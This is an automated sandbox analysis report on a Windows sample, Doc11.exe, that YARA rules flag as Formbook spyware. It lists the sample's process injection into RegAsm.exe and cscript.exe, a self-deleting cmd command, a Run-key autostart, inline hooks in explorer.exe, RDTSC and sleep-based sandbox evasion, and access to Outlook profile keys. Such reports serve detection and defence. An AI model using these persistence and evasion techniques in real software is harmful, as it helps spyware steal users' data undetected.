          Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.196543401.0000000006320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.441196433.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.196042913.0000000004D22000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.441238070.0000000000D20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.226978811.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.226316496.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.440648405.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Doc11.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/4@3/4
          Source: C:\Users\user\Desktop\Doc11.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Doc11.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5708:120:WilError_01
          Source: Doc11.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Doc11.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\7L8580B-\7L8logri.iniJump to behavior
          Source: C:\Users\user\Desktop\Doc11.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Doc11.exeVirustotal: Detection: 34%
          Source: Doc11.exeReversingLabs: Detection: 25%
          Source: unknownProcess created: C:\Users\user\Desktop\Doc11.exe 'C:\Users\user\Desktop\Doc11.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Doc11.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Users\user\Desktop\Doc11.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32
          Source: C:\Windows\SysWOW64\cscript.exeFile written: C:\Users\user\AppData\Roaming\7L8580B-\7L8logri.iniJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Doc11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Doc11.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: RegAsm.exe, 00000002.00000002.227587280.0000000003010000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000002.00000002.227632586.0000000003100000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.443093817.0000000004CDF000.00000040.00000001.sdmp
          Source: Binary string: RegAsm.pdb source: cscript.exe, 00000006.00000002.441341304.0000000000DA7000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: RegAsm.exe, cscript.exe
          Source: Binary string: RegAsm.pdb4 source: cscript.exe, 00000006.00000002.441341304.0000000000DA7000.00000004.00000020.sdmp
          Source: Binary string: cscript.pdb source: RegAsm.exe, 00000002.00000002.227587280.0000000003010000.00000040.00000001.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417C5A push esp; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041CDF5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041658D push ds; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041CE42 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041CE4B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004176EE push cs; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041CEAC push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0317D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_04C3D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B1DB5C push edi; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B1DCA9 push 0D8910A8h; iretd
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B17C5A push esp; iretd
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B1CDF5 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B1CEAC push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B176EE push cs; retf
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B1CE42 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_00B1CE4B push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85074481612

          Boot Survival:

          barindex
          Creates an undocumented autostart registry key Show sources
          Source: C:\Windows\SysWOW64\cscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 3FL0ZNGX9Jump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xED
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Doc11.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 00000000004098D4 second address: 00000000004098DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000409B3E second address: 0000000000409B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000B098D4 second address: 0000000000B098DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000B09B3E second address: 0000000000B09B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409A70 rdtsc
          Source: C:\Users\user\Desktop\Doc11.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Doc11.exe TID: 4472Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4968Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 3276Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: explorer.exe, 00000003.00000000.208172847.0000000007E80000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.191541658.0000000000DB8000.00000004.00000020.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}=1
          Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000002.452746003.000000000474A000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.210149514.0000000007FBB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000002.452859301.00000000047E8000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.205152318.0000000006912000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.210095455.0000000007FAC000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m
          Source: explorer.exe, 00000003.00000000.213997024.000000000E5C0000.00000004.00000001.sdmpBinary or memory string: TJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
          Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.208055551.0000000007E03000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation